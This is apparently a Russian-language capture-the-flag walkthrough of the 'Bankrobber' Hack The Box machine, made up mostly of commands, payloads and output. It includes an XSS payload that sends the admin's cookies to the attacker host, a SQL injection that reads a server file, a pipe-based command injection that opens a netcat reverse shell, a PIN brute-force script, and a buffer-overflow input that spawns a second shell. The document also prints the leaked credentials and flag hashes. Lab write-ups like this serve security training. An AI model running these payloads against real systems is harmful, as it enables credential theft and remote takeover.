Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.154 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open ssl/http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m06s, deviation: 0s, median: 4m06s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-04T11:00:22
|_ start_date: 2021-06-04T10:55:07
Веб
- создадим пользователя
123user:123user123
- id, username и password сохраняются как cookie
Отправляем монеты кому-нибудь => admin проверяет транзакцию.
В комментарий пробросим XSS:
javascript:document.write('<script>img = new Image(); img.src = "http://10.10.14.6/img.gif?"+document.cookie;</script>')
Стартуем сервер python3 -m http.server 80
=>
"GET /img.gif?username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
=> admin:Hopelessromantic
=> логинимся как admin.
Xampp
https://10.10.10.154/notes.txt => default xampp folder (C:\xampp
)
SQL Injection
Пробуем в поиске пользователя:
1 and 1=1
Используем Burp Repeater, чтобы найти идентификатор количества колонок:
term=1'+order+by+3--+- - ok
term=1'+order+by+4--+- - not ok
=> 3 колонки
term=1'+union+select+user(),2,3--+-
root@localhost
term=1'+union+select+database(),2,3--+-
bankrobber
term=1'+union+select+load_file("C:/xampp/htdocs/admin/backdoorchecker.php"),2,3--+-
<?php
include('../link.php');
include('auth.php');
$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){
$good = "dir";
}
if($username == "admin" && $password == "Hopelessromantic"){
if(isset($_POST['cmd'])){
// FILTER ESCAPE CHARS
foreach($bad as $char){
if(strpos($_POST['cmd'],$char) !== false){
die("You're not allowed to do that.");
}
}
// CHECK IF THE FIRST 2 CHARS ARE LS
if(substr($_POST['cmd'], 0,strlen($good)) != $good){
die("It's only allowed to use the $good command");
}
if($_SERVER['REMOTE_ADDR'] == "::1"){
system($_POST['cmd']);
} else{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}
}
} else{
echo "You are not allowed to use this function!";
}
?>
=> pipe |
символ не проверяется.
$ nano script.js:
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | \\\\10.10.14.6\\share\\nc.exe 10.10.14.6 1234 -e cmd.exe";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);
Стартуем сервер самбы:
smbserver.py -smb2support share $(pwd)
nc -lnvp 1234
Отправляем транзакцию с помощью Burp:
POST /user/transfer.php HTTP/1.1
Host: 10.10.10.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://10.10.10.154
Connection: close
Referer: http://10.10.10.154/user/
Cookie: id=3; username=MTIzdXNlcg%3D%3D; password=MTIzdXNlcjEyMw%3D%3D
fromId=3&toId=1&amount=1&comment=<script+src="http://10.10.14.6/script.js"></script>
Запускаем сервер python3 -m http.server 80
.
Флаг пользователя
C:\Users\Cortin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
IPv4 Address. . . . . . . . . . . : 10.10.10.154
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Cortin\Desktop>type user.txt
f635346600876a43441cf1c6e94769ac
Повышение привилегий
$ netstat -anop TCP
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2904
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 748
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2904
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1620
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1828
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 464
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 920
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 892
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1416
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 592
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 600
TCP 10.10.10.154:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.154:49848 10.10.14.6:445 ESTABLISHED 4
TCP 10.10.10.154:49850 10.10.14.6:1234 ESTABLISHED 4160
TCP 127.0.0.1:3306 127.0.0.1:49846 ESTABLISHED 1828
TCP 127.0.0.1:3306 127.0.0.1:49847 ESTABLISHED 1828
TCP 127.0.0.1:49846 127.0.0.1:3306 ESTABLISHED 3156
TCP 127.0.0.1:49847 127.0.0.1:3306 ESTABLISHED 3156
TCP 127.0.0.1:49854 127.0.0.1:3306 TIME_WAIT 0
=> 910 порт странный.
Port Forwarding
Используем Chisel:
$ wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_amd64.gz
$ gunzip chisel..
for windows and for linux
https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz
$ ./chisel server --port 5555 -reverse
И на машине:
certutil -urlcache -f "http://10.10.14.6/chisel_1.7.6_windows_amd64" chisel.exe
chisel client 10.10.14.6:5555 R:910:127.0.0.1:910
На локальной машине:
$ nc 127.0.0.1 910
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 1234
[!] Access denied, disconnecting client....
Пишем скрипт для брута code.py
:
import socket
for i in range(0, 10000):
code = "0" * (4 - len(str(i))) + str(i)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 910))
data = s.recv(8192)
s.send(code.encode() + b"\n")
data = s.recv(8192).decode("utf-8")
s.close()
if "Access denied" not in data:
print(f"valid code: {code}")
break
$ python code.py
0021
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN is correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 100
[$] Transfering $100 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
[$] Transaction in progress, you can safely disconnect...
=> пробуем buffer overflow => копируем nc.exe
в C:\users\public\nc.exe
После этого:
$ nc -lnvp 1235
$ nc localhost 910
0021
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:\Users\Public\nc.exe 10.10.14.6 1235 -e cmd.exe
Флаг суперпользователя
C:\Users\admin\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::558a:2e46:9d1f:9962
Temporary IPv6 Address. . . . . . : dead:beef::423:ec2c:39c7:2b02
Link-local IPv6 Address . . . . . : fe80::558a:2e46:9d1f:9962%2
IPv4 Address. . . . . . . . . . . : 10.10.10.154
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%2
10.10.10.2
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\admin\Desktop>type root.txt
aa65d8e6216585ea636eb07d4a59b197